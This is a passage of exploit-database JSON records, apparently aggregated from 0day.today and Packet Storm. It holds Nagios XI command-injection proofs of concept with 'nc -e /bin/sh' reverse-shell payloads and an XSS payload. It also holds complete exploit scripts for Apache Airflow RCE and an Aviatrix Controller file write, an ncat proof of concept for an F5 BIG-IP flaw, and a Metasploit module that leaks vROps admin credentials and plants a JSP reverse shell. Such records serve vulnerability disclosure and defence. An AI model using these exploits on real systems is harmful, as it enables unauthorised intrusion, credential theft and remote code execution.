Eg: `plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;`\r\n\r\n\r\n## CVE-2021-25297\r\n\r\n### Code Location\r\n\r\n`/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php`\r\n\r\n### Code Snippet\r\n\r\n```php\r\nfunction switch_configwizard_add_cfg_to_mrtg($address)\r\n{\r\n // get the data that we need\r\n $mrtg_confd_dir = \"/etc/mrtg/conf.d\";\r\n echo $address;\r\n $mrtg_cfg_file = \"{$address}.cfg\";\r\n $absolute_mrtg_cfg_file = \"{$mrtg_confd_dir}/{$mrtg_cfg_file}\";\r\n $cfgmaker_file = switch_configwizard_get_walk_file($address);\r\n // check if the file already exists for useful debugging\r\n $mrtg_confd_contents = scandir($mrtg_confd_dir);\r\n echo \"REACHED HERE1\";\r\n if (in_array($mrtg_cfg_file, $mrtg_confd_contents)) {\r\n debug(\"{$mrtg_cfg_file} exists in {$mrtg_confd_dir}, overwriting\");\r\n } else {\r\n debug(\"{$mrtg_cfg_file} does not exist in {$mrtg_confd_dir}, creating\");\r\n }\r\n echo \"REACHED HERE2\";\r\n // copy the cfgmaker file to the mrtg cfg destination\r\n echo $cfgmaker_file;\r\n echo $absolute_mrtg_cfg_file;\r\n if (!copy($cfgmaker_file, $absolute_mrtg_cfg_file)) {\r\n debug(\"Unable to copy from {$cfgmaker_file} to {$absolute_mrtg_cfg_file}\");\r\n return false;\r\n }\r\n echo \"REACHED HERE3\";\r\n echo $absolute_mrtg_cfg_file;\r\n // add some meta info to the file\r\n $infoline = \"#### ADDED BY NAGIOSXI (User: \". get_user_attr(0, 'username') .\", DATE: \". 
get_datetime_string(time()) .\") ####\\n\";\r\n exec(\"sed -i '1s|.*|{$infoline}&|' $absolute_mrtg_cfg_file\");\r\n\r\n return true;\r\n}\r\n```\r\n\r\n### POC (Works with admin/non-admin authentication)\r\n\r\n```\r\nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2=\r\n```\r\n\r\nThe `ip_address` variable here is not sanitized and can give `command execution`. 
Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;`\r\n\r\n\r\n## CVE-2021-25298\r\n\r\n### Code path\r\n\r\n`/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php`\r\n\r\n### Code Snippet\r\n\r\n```php\r\ncase CONFIGWIZARD_MODE_GETSTAGE2HTML:\r\n\r\n // echo (\"reached here ============================\");\r\n // Get variables that were passed to us\r\n $address = grab_array_var($inargs, \"ip_address\", \"\"); // [User input]\r\n $port = grab_array_var($inargs, \"port\", \"\");\r\n $token = grab_array_var($inargs, \"token\", \"\");\r\n $no_ssl_verify = grab_array_var($inargs, \"no_ssl_verify\", 1);\r\n $hostname = grab_array_var($inargs, 'hostname', gethostbyaddr($address));\r\n $default_mem_units = grab_array_var($inargs, 'default_mem_units', 'Gi');\r\n $tcp_check_port = grab_array_var($inargs, 'tcp_check_port', '5693');\r\n $rp_address = nagiosccm_replace_user_macros($address);\r\n $rp_port = nagiosccm_replace_user_macros($port);\r\n $rp_token = nagiosccm_replace_user_macros($token);\r\n $services_serial = grab_array_var($inargs, \"services_serial\", \"\");\r\n if ($services_serial) {\r\n $services = unserialize(base64_decode($services_serial));\r\n }\r\n // echo $rp_address;\r\n $not_used = array();\r\n $return_code = 0;\r\n $alternative_host_check = false;\r\n exec('ping -W 2 -c 1 ' . $rp_address, $not_used, $return_code); // [Bug here]\r\n```\r\n\r\n### POC (Works with admin/non-admin authentication)\r\n\r\n```\r\nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2=\r\n```\r\n\r\nThe `ip_address` variable here is not sanitized and can give `command execution`. 
Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;`\r\n\r\n\r\n## CVE-2021-25299\r\n\r\n### Code Location\r\n\r\n`/usr/local/nagiosxi/html/admin/sshterm.php`\r\n\r\n### Code Snippet\r\n\r\n```php+HTML\r\n<?php if ($efe) { ?>\r\n <iframe src=\"<?php echo $url; ?>\" style=\"width: 50%; min-width: 600px; height: 500px;\"></iframe>\r\n <?php } else { ?>\r\n <div style=\"color: #FFF; font-size: 14px; font-family: consolas, courier-new; background-color: #000; padding: 2px 6px; overflow-y: scroll; width: 50%; min-width: 600px; height: 500px;\">Enterprise features must be enabled</div>\r\n<?php\r\n}\r\n```\r\n\r\n### POC\r\n\r\n`https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)`\r\n\r\nThe `url` variable is not sanitized and can give `xss` .\n\n# 0day.today [2021-09-10] #", "sourceHref": "https://0day.today/exploit/35875", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-04T15:54:24", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-02T00:00:00", "type": "zdt", "title": "Apache Airflow 1.10.10 - (Example Dag) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13927"], "modified": "2021-06-02T00:00:00", "id": "1337DAY-ID-36329", "href": "https://0day.today/exploit/description/36329", "sourceData": "# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution \n# Exploit Author: Pepe Berba\n# Vendor Homepage: https://airflow.apache.org/\n# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html\n# Version: <= 1.10.10\n# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)\n# CVE : CVE-2020-11978\n# \n# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow\n# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.\n# Together, potentially allows unauthenticated RCE to Airflow \n# \n# Repo: https://github.com/pberba/CVE-2020-11978\n# More information can be found here: \n# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E\n# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E\n#\n# Remediation:\n# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.\n# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. 
You can also manually delete example_trigger_target_dag DAG.\n#\n# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 \"touch test\"\n\nimport argparse\nimport requests\nimport sys\nimport time\n\ndef create_dag(url, cmd):\n\tprint('[+] Checking if Airflow Experimental REST API is accessible...')\n\tcheck = requests.get('{}/api/experimental/test'.format(url))\n\n\tif check.status_code == 200:\n\t\tprint('[+] /api/experimental/test returned 200' )\n\telse:\n\t\tprint('[!] /api/experimental/test returned {}'.format(check.status_code))\n\t\tprint('[!] Airflow Experimental REST API not be accessible')\n\t\tsys.exit(1)\n\n\tcheck_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))\n\tif check_task.status_code != 200:\n\t\tprint('[!] Failed to find the example_trigger_target_dag.bash_task')\n\t\tprint('[!] Host isn\\'t vunerable to CVE-2020-11978')\n\t\tsys.exit(1)\n\telif 'dag_run' in check_task.json()['env']:\n\t\tprint('[!] example_trigger_target_dag.bash_task is patched')\n\t\tprint('[!] Host isn\\'t vunerable to CVE-2020-11978')\n\t\tsys.exit(1)\n\tprint('[+] example_trigger_target_dag.bash_task is vulnerable')\n\n\tunpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))\n\tif unpause.status_code != 200:\n\t\tprint('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')\n\t\tsys.exit(1)\n\telse:\n\t\tprint('[+] example_trigger_target_dag was enabled')\n\n\tprint('[+] Creating new DAG...')\n\tres = requests.post(\n\t '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),\n\t json={\n\t 'conf': {\n\t 'message': '\"; {} #'.format(cmd)\n\t }\n\t }\n\t)\n\n\tif res.status_code == 200:\n\t\tprint('[+] Successfully created DAG')\n\t\tprint('[+] \"{}\"'.format(res.json()['message']))\n\telse:\n\t\tprint('[!] 
Failed to create DAG')\n\t\tsys.exit(1)\n\n\twait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(\n\t\turl = url,\n\t\texecution_date=res.json()['execution_date']\n\t)\n\n\tstart_time = time.time()\n\tprint('[.] Waiting for the scheduler to run the DAG... This might take a minute.')\n\tprint('[.] If the bash task is never queued, then the scheduler might not be running.')\n\twhile True:\n\t\ttime.sleep(10)\n\t\tres = requests.get(wait_url)\n\t\tstatus = res.json()['state']\n\t\tif status == 'queued':\n\t\t\tprint('[.] Bash task queued...')\n\t\telif status == 'running':\n\t\t\tprint('[+] Bash task running...')\n\t\telif status == 'success':\n\t\t\tprint('[+] Bash task successfully ran')\n\t\t\tbreak\n\t\telif status == 'None':\n\t\t\tprint('[-] Bash task is not yet queued...'.format(status))\n\t\telse:\n\t\t\tprint('[!] Bash task was {}'.format(status))\n\t\t\tsys.exit(1)\n\n\treturn 0\n\n\ndef main():\n\targ_parser = argparse.ArgumentParser()\n\targ_parser.add_argument('url', type=str, help=\"Base URL for Airflow\")\n\targ_parser.add_argument('command', type=str)\n\targs = arg_parser.parse_args()\n\n\tcreate_dag(\n\t\targs.url, \n\t\targs.command\n\t)\n\nif __name__ == '__main__':\n\tmain()\n", "sourceHref": "https://0day.today/exploit/36329", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-20T06:08:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T00:00:00", "type": "zdt", "title": "Aviatrix Controller 6.x Path Traversal / Code Execution Exploit", 
"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-12T00:00:00", "id": "1337DAY-ID-36888", "href": "https://0day.today/exploit/description/36888", "sourceData": "#!/usr/bin/env python3\nimport requests\nfrom requests.structures import CaseInsensitiveDict\nfrom colorama import Fore, Style\nimport argparse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nprint(f\"\"\"\n\n\u2591\u2588\u2580\u2580\u2588 \u2591\u2588\u2500\u2500\u2591\u2588 \u2591\u2588\u2580\u2580\u2580 \u2500\u2500 \u2588\u2580\u2588 \u2588\u2580\u2580\u2588 \u2588\u2580\u2588 \u2584\u2588\u2500 \u2500\u2500 \u2500\u2588\u2580\u2588\u2500 \u2588\u2580\u2580\u2588 \u2584\u2580\u2580\u2584 \u2584\u2580\u2580\u2584 \u2588\u2580\u2580\u2588\n\u2591\u2588\u2500\u2500\u2500 \u2500\u2591\u2588\u2591\u2588\u2500 \u2591\u2588\u2580\u2580\u2580 \u2580\u2580 \u2500\u2584\u2580 \u2588\u2584\u2580\u2588 \u2500\u2584\u2580 \u2500\u2588\u2500 \u2580\u2580 \u2588\u2584\u2584\u2588\u2584 \u2588\u2584\u2580\u2588 \u2584\u2580\u2580\u2584 \u2588\u2584\u2584\u2500 \u2588\u2584\u2580\u2588\n\u2591\u2588\u2584\u2584\u2588 \u2500\u2500\u2580\u2584\u2580\u2500 \u2591\u2588\u2584\u2584\u2584 \u2500\u2500 \u2588\u2584\u2584 \u2588\u2584\u2584\u2588 \u2588\u2584\u2584 \u2584\u2588\u2584 \u2500\u2500 \u2500\u2500\u2500\u2588\u2500 \u2588\u2584\u2584\u2588 \u2580\u2584\u2584\u2580 \u2580\u2584\u2584\u2580 
\u2588\u2584\u2584\u2588\n Author : 0xJoyGhosh\n Org : System00 Security\n Twitter: @0xjoyghosh\n\n\"\"\")\ntry:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\", \"--url\", help=\"Enter Target Url With scheme Ex: -u https://avaitix.target.com\", type=str)\n parser.add_argument(\"-c\", \"--code\", help=\"Enter php code Ex: -c '<?php phpinfo(); ?>' \", type=str)\n parser.add_argument(\"-n\", \"--name\", help=\"Enter php code Ex: -n 'filename' \", type=str)\n args = parser.parse_args()\n url =f\"{args.url}/v1/backend1\"\nexcept TypeError:\n print(\"Type -h To See all the options\")\nexcept():\n exit()\ndef exploit(url,path,code):\n headers = CaseInsensitiveDict()\n headers[\"Content-Type\"] = \"application/x-www-form-urlencoded\"\n data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'\n resp = requests.post(url, headers=headers, data=data,verify=False)\n stat = requests.get(f\"{args.url}/v1/{path}\",verify=False)\n if resp.status_code==200:\n if stat.status_code==200:\n print(f\"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]\")\n print(\"\")\n else:\n print(\"[ Exploit successful Creating File Failed ]\")\n pass\n else:\n print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')\n\nif args.url is not None:\n if args.code is not None:\n if args.name is not None:\n exploit(url,args.name,args.code)\n else:\n print('Type -h to see help Menu')\n else:\n print('Type -h to see help Menu')\nelse:\n print('Type -h to see help Menu')\n", "sourceHref": "https://0day.today/exploit/36888", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-22T06:55:38", "description": "Big IP's Traffic Management Microkernels (TMM) URI normalization incorrectly handles invalid IPv6 hostnames allowing for information disclosure and an out-of-bounds write condition.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-12T00:00:00", "type": "zdt", "title": "F5 Big IP TMM uri_normalize_host Information Disclosure / Out-Of-Bounds Write Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991"], "modified": "2021-03-12T00:00:00", "id": "1337DAY-ID-35933", "href": "https://0day.today/exploit/description/35933", "sourceData": "F5 Big IP - TMM uri_normalize_host infoleak and out-of-bounds write\r\n\r\nBig IP's Traffic Management Microkernels (TMM) URI normalization incorrectly handles invalid IPv6 hostnames:\r\n\r\nWhen uri_normalize_host is called with a hostname of the form \\u\"[abcdef]\\u\", uri_norm_inet6 is called\r\nwith the substring abcdef as an argument. 
Pseudo code of this function is shown below:\r\n\r\nint uri_norm_inet6(char *inbuf, int64_t inlen, char *outbuf, _DWORD *outlen) {\r\n struct in6_addr s; unsigned int ret;\r\n\r\n ret = uri_inet6_pton(inbuf, inlen, &s); if ( !ret ) {\r\n if ( inet_ntop(AF_INET6, &s, outbuf, 46u) ) *outlen = strlen(outbuf);\r\n else ret = 3;\r\n } return ret;\r\n}\r\n\r\nThe s hostname is first passed to uri_inet6_pton, which is responsible for parsing a text IPv6\r\naddress and initializing the network address structure s. If the function doesn't return an error,\r\ninet_ntop is called to turn s back into a printable (and normalized) string.\r\n\r\nThe bug is that uri_inet6_pton incorrectly handles short hostnames. When a single hex character is\r\npassed to the function, it will only initialize the first two bytes of the in6_addr structure\r\nwithout returning an error. This means inet_ntop will now happily convert uninitialized stack memory\r\ninto a printable IPv6 hostname.\r\n\r\nWhile this could already be a security vulnerability if the normalized hostname becomes visible to\r\nthe attacker, it also breaks one of the core assumptions of callers of uri_normalize: Under normal\r\ncircumstances, a normalized URL should never be longer than 3*input_length + 2 (this handles the\r\nworst case scenario of URL encoding every character in the URL + adding slashes). This means callers\r\ncan just allocate an outbuf buffer with this size and the URI normalization functions do not have to\r\nperform any length checks.\r\n\r\nHowever, due to the described bug, the size invariant does not hold anymore leading to a\r\nstraightforward out-of-bound write.\r\n\r\nTMM's URI normalization is used in a number of places. Luckily most of them do not perform\r\nnormalization on the hostname allowing them to avoid this bug.\r\n\r\nHowever, there are a couple of configurations that can expose this bug to an attacker. 
(This list is\r\nbased on static analysis as I don't have a test environment where I can verify all variants) iRules\r\nor BIG-IP LTM policies that use the \\\"normalize URI\\\" config option URL categorization as part of APM,\r\nSWG or PEM Risk Classification\r\n\r\nProof of Concept: \r\n\r\nFor a server configured with the following iRule: \r\nwhen HTTP_REQUEST { \r\nlog local0. \\\"normalized: [HTTP::uri -normalized]\\\" \r\nlog local0. \\\"uri: [HTTP::uri]\\\" }\r\n\r\nSend a request like this: echo -e \\\"GET h://[f] HTTP/1.1\\\\\r\n\\\\\r\n\\\" | ncat --ssl 10.154.0.3 443\r\n\r\nThis will log uninitialized memory to /var/log/ltm on the F5 host: \r\nDec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: normalized: h://[aa:cf01::c00:0:1100:0]/ \r\nDec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: uri: h://[aa]\r\n\r\nFor debug TMM's using `wrapped_umem_alloc` for heap allocations, it will also lead to a direct\r\ncrash of the TMM due to the heap buffer overflow.\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse,\r\nthe bug report will become visible to the public. The scheduled disclosure\r\ndate is 2021-03-10. Disclosure at an earlier date is also possible if\r\nagreed upon by all parties.\r\n\r\nCredit Information: \r\n\r\nFelix Wilhelm of Google Project Zero\r\n\r\nRelated CVE Numbers: CVE-2021-22991.\n\n# 0day.today [2021-09-22] #", "sourceHref": "https://0day.today/exploit/35933", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:46:49", "description": "This Metasploit module exploits a pre-auth server-side request forgery (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. 
Code execution occurs as the \"admin\" Unix user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-27T00:00:00", "type": "zdt", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "1337DAY-ID-36160", "href": "https://0day.today/exploit/description/36160", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations 
Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested against 8.0.1.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? 
CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n 
fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36160", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "packetstorm": [{"lastseen": "2023-02-08T16:40:23", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-08T00:00:00", "type": "packetstorm", "title": "Nagios XI 5.7.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 